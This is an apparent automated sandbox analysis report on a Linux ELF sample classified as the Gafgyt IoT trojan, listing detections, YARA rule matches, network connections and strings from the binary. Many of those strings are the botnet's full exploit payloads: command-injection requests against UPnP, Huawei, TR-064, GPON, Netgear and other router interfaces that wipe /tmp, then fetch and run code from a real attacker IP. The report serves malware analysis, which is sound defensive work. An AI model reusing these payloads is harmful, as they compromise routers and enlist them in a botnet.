Click to jump to signature section
Source: yNGgbod6dt.elf | ReversingLabs: Detection: 41% |
Source: yNGgbod6dt.elf | Virustotal: Detection: 49% | Perma Link |
Source: yNGgbod6dt.elf | String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> |
Source: yNGgbod6dt.elf | String: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1 |
Source: global traffic | TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443 |
Source: global traffic | TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80 |
Source: global traffic | TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443 |
Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.173.195.220 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.173.195.220 |
Source: unknown | TCP traffic detected without corresponding DNS query: 190.107.216.65 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43 |
Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202 |
Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42 |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/diag00/log21.mips |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh; |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh;chmod$ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://89.208.107.26/miniupd.sh;sh |
Source: yNGgbod6dt.elf | String found in binary or memory: http://purenetworks.com/HNAP1/ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: yNGgbod6dt.elf | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/ |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13 |
Source: yNGgbod6dt.elf, type: SAMPLE | Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16 |
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | Potential command found: GET /shell?rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/jaws;sh+jaws HTTP/1.1 |
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.sh |
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://89.208.107.26/miniupd.sh+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: Initial sample | Potential command found: GET / |
Source: Initial sample | Potential command found: GET /%s HTTP/1.0 |
Source: ELF static info symbol of initial sample | .symtab present: no |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>busybox wget http://89.208.107.26/miniupd.sh; sh w.sh; curl http://89.208.107.26/miniupd.sh; sh c.sh; wget 89.208.107.26/miniupd.sh; sh wget.sh; curl http://89.208.107.26/miniupd.sh; sh wget.sh; busybox wget http://89.208.107.26/miniupd.sh; sh wget.sh; busybox curl http://89.208.107.26/miniupd.sh; sh wget.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>GET HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon80;sh+/tmp/gpon80&ipv=0GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://89.208.107.26/miniupd.sh;chmod${IFS}777${IFS}miniupd.sh;sh${IFS}/tmp/miniupd.sh&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;busybox+wget+http://89.208.107.26/miniupd.sh+-O+/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://89.208.107.26/miniupd.sh;sh+/tmp/miniupd.shPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/huawei;chmod -x /tmp/huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /HNAP1/ HTTP/1.0 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://89.208.107.26/diag00/log21.mips && chmod 777 log21.mips && ./log21.mips tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>POST /UD/act?1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`rm -rf /tmp/* && /bin/busybox tftp -g 89.208.107.26 -r /diag00/log21.mips -l /tmp/msbin && chmod 777 /tmp/msbin && /tmp/msbin tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>%d.%d.%d.%dGET /HEAD /POST /HTTP/1.1 404 Not FoundServer: ApacheContent-Length: %d |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: Initial sample | String containing 'busybox' found: /bin/busybox |
Source: Initial sample | String containing 'busybox' found: bin/busybox |
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 89.208.107.26 -l /tmp/.mupd -r diag00/log21.mips; /bin/busybox chmod 777 /tmp/.mupd; /tmp/.mupd selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | String containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f |
Source: classification engine | Classification label: mal76.spre.troj.linELF@0/0@0/0 |
Source: Yara match | File source: yNGgbod6dt.elf, type: SAMPLE |
Source: Yara match | File source: yNGgbod6dt.elf, type: SAMPLE |